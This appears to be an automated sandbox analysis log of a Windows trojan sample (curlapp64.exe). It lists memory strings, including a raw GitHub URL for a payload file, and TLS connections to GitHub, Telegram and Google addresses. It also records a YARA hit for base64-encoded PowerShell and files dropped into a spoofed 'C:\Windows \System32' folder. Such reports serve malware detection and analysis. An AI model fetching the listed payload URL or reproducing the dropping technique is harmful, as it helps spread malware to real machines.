    Source: curlapp64.exe, 00000005.00000002.2165249434.00000231626B6000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000003.2164909140.00000231626A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.dat1
    Source: curlapp64.exe, 00000005.00000002.2165249434.00000231626B6000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000003.2164909140.00000231626A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.datF
    Source: curlapp64.exe, 00000005.00000002.2165249434.00000231626B6000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000003.2164909140.00000231626A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.datc
    Source: curlapp64.exe, 00000009.00000002.2276560928.00000260AC324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.date
    Source: curlapp64.exe, 00000005.00000002.2165249434.00000231626A3000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000003.2164909140.00000231626A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.dats
    Source: curlapp64.exe, 00000009.00000002.2276560928.00000260AC307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.dattprnt.dat
    Source: curlapp64.exe, 00000009.00000002.2276560928.00000260AC307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.datv9&T
    Source: svchost.exe, 00000031.00000002.3260567095.00000000660F4000.00000008.00000001.01000000.00000015.sdmpString found in binary or memory: https://www.gnu.org/licenses/
    Source: svchost.exeString found in binary or memory: https://www.openssl.org/
    Source: svchost.exe, 00000031.00000002.3262314667.00007FF8B7EF1000.00000002.00000001.01000000.00000011.sdmp, svchost.exe, 00000031.00000002.3261905733.00007FF8A6FCE000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: https://www.openssl.org/H
    Source: unknownNetwork traffic detected: HTTP traffic on port 52628 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52653 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52911
    Source: unknownNetwork traffic detected: HTTP traffic on port 52682 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52671
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52634
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52632
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52935 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52941 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52803
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52924
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52927
    Source: unknownNetwork traffic detected: HTTP traffic on port 52927 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52682
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52886
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52938 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52665 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52944 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52634 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52935
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52938
    Source: unknownNetwork traffic detected: HTTP traffic on port 52947 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52924 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52886 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52653
    Source: unknownNetwork traffic detected: HTTP traffic on port 52671 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52944
    Source: unknownNetwork traffic detected: HTTP traffic on port 52629 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52628
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52947
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52629
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52941
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52665
    Source: unknownNetwork traffic detected: HTTP traffic on port 52911 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 52632 -> 443
    Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49706 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49712 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49720 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49724 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:52628 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:52632 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:52653 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:52665 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:52803 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:52886 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:52911 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:52924 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:52927 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:52935 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:52938 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:52941 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:52944 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:52947 version: TLS 1.2
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7E72B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,5_2_00007FF8B7E72B80
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B80D2B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,49_2_00007FF8B80D2B80
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B80D2B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,55_2_00007FF8B80D2B80
    Source: powershell.exeProcess created: 44
    Source: cmd.exeProcess created: 84

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: Process Memory Space: powershell.exe PID: 6184, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B8B159C0: GetFileAttributesA,GetLastError,_errno,CreateFileA,GetLastError,DeviceIoControl,_errno,GetLastError,FormatMessageA,libintl_gettext,__acrt_iob_func,LocalFree,CloseHandle,_errno,CloseHandle,WideCharToMultiByte,_errno,isalpha,memcpy,49_2_00007FF8B8B159C0
    Source: C:\Users\user\Desktop\curlapp64.exeFile created: C:\Windows \System32\printui.exeJump to behavior
    Source: C:\Windows\System32\cmd.exeFile created: C:\WindowsJump to behavior
    Source: C:\Windows\System32\cmd.exeFile created: C:\Windows \System32Jump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\usvcldr64.datJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\winsvcfJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\winsvcf\winlogsvcJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcurl.dllJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\zlib1.dllJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcrypto-3-x64.dllJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libiconv-2.dllJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libintl-9.dllJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libssl-3-x64.dllJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libwinpthread-1.dllJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\console_zero.exeJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libpq.dllJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\ucrtbased.dllJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\vcruntime140d.dllJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\x882081.datJump to behavior
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\bav64.exeJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_pecys42p.wqc.ps1
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF74501B3280_2_00007FF74501B328
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF74502ABEC0_2_00007FF74502ABEC
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF745025E640_2_00007FF745025E64
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF74502A6940_2_00007FF74502A694
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF7450276B00_2_00007FF7450276B0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF7450020E00_2_00007FF7450020E0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF74501B90C0_2_00007FF74501B90C
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF7450117900_2_00007FF745011790
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF7450247D00_2_00007FF7450247D0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF745002FD00_2_00007FF745002FD0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF74501D7D80_2_00007FF74501D7D8
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF745002A500_2_00007FF745002A50
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF74500A2C00_2_00007FF74500A2C0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF74501EADC0_2_00007FF74501EADC
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF74500A9B00_2_00007FF74500A9B0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF74500D1B00_2_00007FF74500D1B0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF745009B200_2_00007FF745009B20
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF74500DBF00_2_00007FF74500DBF0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF745028BFC0_2_00007FF745028BFC
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9750405_2_00007FF6CF975040
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9C393C5_2_00007FF6CF9C393C
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9999505_2_00007FF6CF999950
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9989B05_2_00007FF6CF9989B0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9742E05_2_00007FF6CF9742E0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9992205_2_00007FF6CF999220
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9720F05_2_00007FF6CF9720F0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9B21285_2_00007FF6CF9B2128
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9C00405_2_00007FF6CF9C0040
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9AEFD85_2_00007FF6CF9AEFD8
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9AAF605_2_00007FF6CF9AAF60
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9B3FA85_2_00007FF6CF9B3FA8
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF987FB05_2_00007FF6CF987FB0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF972F005_2_00007FF6CF972F00
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9AEDD45_2_00007FF6CF9AEDD4
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF98DDB05_2_00007FF6CF98DDB0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9ACD805_2_00007FF6CF9ACD80
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9AFD185_2_00007FF6CF9AFD18
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF987C705_2_00007FF6CF987C70
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9B8BC85_2_00007FF6CF9B8BC8
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF997BA05_2_00007FF6CF997BA0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9C1BB45_2_00007FF6CF9C1BB4
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9BEAF45_2_00007FF6CF9BEAF4
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9859F05_2_00007FF6CF9859F0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9AAA285_2_00007FF6CF9AAA28
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9B19B45_2_00007FF6CF9B19B4
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9729805_2_00007FF6CF972980
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9879305_2_00007FF6CF987930
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9967705_2_00007FF6CF996770
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9B87305_2_00007FF6CF9B8730
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF98A6705_2_00007FF6CF98A670
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9BC6805_2_00007FF6CF9BC680
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9986805_2_00007FF6CF998680
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9875E05_2_00007FF6CF9875E0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9A16305_2_00007FF6CF9A1630
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9924D05_2_00007FF6CF9924D0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9C33E45_2_00007FF6CF9C33E4
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9882F05_2_00007FF6CF9882F0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9B92405_2_00007FF6CF9B9240
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9982405_2_00007FF6CF998240
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9BB24C5_2_00007FF6CF9BB24C
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9BD2A85_2_00007FF6CF9BD2A8
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9B52AC5_2_00007FF6CF9B52AC
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9872905_2_00007FF6CF987290
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9AF1DC5_2_00007FF6CF9AF1DC
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9822005_2_00007FF6CF982200
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF99D1605_2_00007FF6CF99D160
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7E9B4E05_2_00007FF8B7E9B4E0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7E9A4A45_2_00007FF8B7E9A4A4
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EC04A65_2_00007FF8B7EC04A6
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EAFE305_2_00007FF8B7EAFE30
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EB6B505_2_00007FF8B7EB6B50
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7E9AA525_2_00007FF8B7E9AA52
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7E849E05_2_00007FF8B7E849E0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7E9C7B05_2_00007FF8B7E9C7B0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7E916F05_2_00007FF8B7E916F0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EB86705_2_00007FF8B7EB8670
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7E9F5005_2_00007FF8B7E9F500
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EB74F05_2_00007FF8B7EB74F0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EAA3A05_2_00007FF8B7EAA3A0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EB00D05_2_00007FF8B7EB00D0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7E6F0C05_2_00007FF8B7E6F0C0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7E73FE05_2_00007FF8B7E73FE0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7E7EFC05_2_00007FF8B7E7EFC0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EBCEC05_2_00007FF8B7EBCEC0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7E9BE305_2_00007FF8B7E9BE30
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EACDD05_2_00007FF8B7EACDD0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EB3D805_2_00007FF8B7EB3D80
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7E73D505_2_00007FF8B7E73D50
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7E71C305_2_00007FF8B7E71C30
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7E72B805_2_00007FF8B7E72B80
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EB2B605_2_00007FF8B7EB2B60
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7E8BA405_2_00007FF8B7E8BA40
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B9F679445_2_00007FF8B9F67944
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B9F62A205_2_00007FF8B9F62A20
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B9F6D0805_2_00007FF8B9F6D080
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B9F6817D5_2_00007FF8B9F6817D
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B9F677AB5_2_00007FF8B9F677AB
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B9F615205_2_00007FF8B9F61520
    Source: C:\Windows \System32\printui.exeCode function: 14_2_00007FF7BAC810E014_2_00007FF7BAC810E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_6600A23049_2_6600A230
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_6601076049_2_66010760
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_6600981049_2_66009810
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_6600BC9049_2_6600BC90
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_660050A049_2_660050A0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_66019CB049_2_66019CB0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_6600ACD049_2_6600ACD0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_66004CE049_2_66004CE0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_6600DD2049_2_6600DD20
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_6600CD6049_2_6600CD60
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_6600E58049_2_6600E580
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_6600D5A049_2_6600D5A0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_660121B049_2_660121B0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_6828A0B049_2_6828A0B0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_6828C22049_2_6828C220
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_68281C1049_2_68281C10
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_6828350049_2_68283500
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_682926C149_2_682926C1
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8A70C100849_2_00007FF8A70C1008
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8A7004C8C49_2_00007FF8A7004C8C
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8A700BCA949_2_00007FF8A700BCA9
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8A700B4E049_2_00007FF8A700B4E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8A7003B0049_2_00007FF8A7003B00
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8A700E34049_2_00007FF8A700E340
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8A70043B149_2_00007FF8A70043B1
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8A700290049_2_00007FF8A7002900
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8A7089A9049_2_00007FF8A7089A90
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8A70C0AB049_2_00007FF8A70C0AB0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8A700AD3049_2_00007FF8A700AD30
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8A70AE9C449_2_00007FF8A70AE9C4
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA38C049_2_00007FF8B7EA38C0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA985F49_2_00007FF8B7EA985F
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E4B83049_2_00007FF8B7E4B830
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E956E049_2_00007FF8B7E956E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E934C049_2_00007FF8B7E934C0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E7F42049_2_00007FF8B7E7F420
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E3740049_2_00007FF8B7E37400
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E3538049_2_00007FF8B7E35380
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E9131049_2_00007FF8B7E91310
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E532C049_2_00007FF8B7E532C0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EB92A049_2_00007FF8B7EB92A0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E8D26049_2_00007FF8B7E8D260
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E8E0F049_2_00007FF8B7E8E0F0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E3C03049_2_00007FF8B7E3C030
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E6202049_2_00007FF8B7E62020
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E97FE049_2_00007FF8B7E97FE0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E5DEA049_2_00007FF8B7E5DEA0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA5E8049_2_00007FF8B7EA5E80
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EB1D3049_2_00007FF8B7EB1D30
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA9CC149_2_00007FF8B7EA9CC1
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EB9C4049_2_00007FF8B7EB9C40
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E33C4049_2_00007FF8B7E33C40
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E95C2049_2_00007FF8B7E95C20
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E3FBB049_2_00007FF8B7E3FBB0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E8DAD049_2_00007FF8B7E8DAD0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E4B95049_2_00007FF8B7E4B950
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E7C70049_2_00007FF8B7E7C700
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E9A6B049_2_00007FF8B7E9A6B0
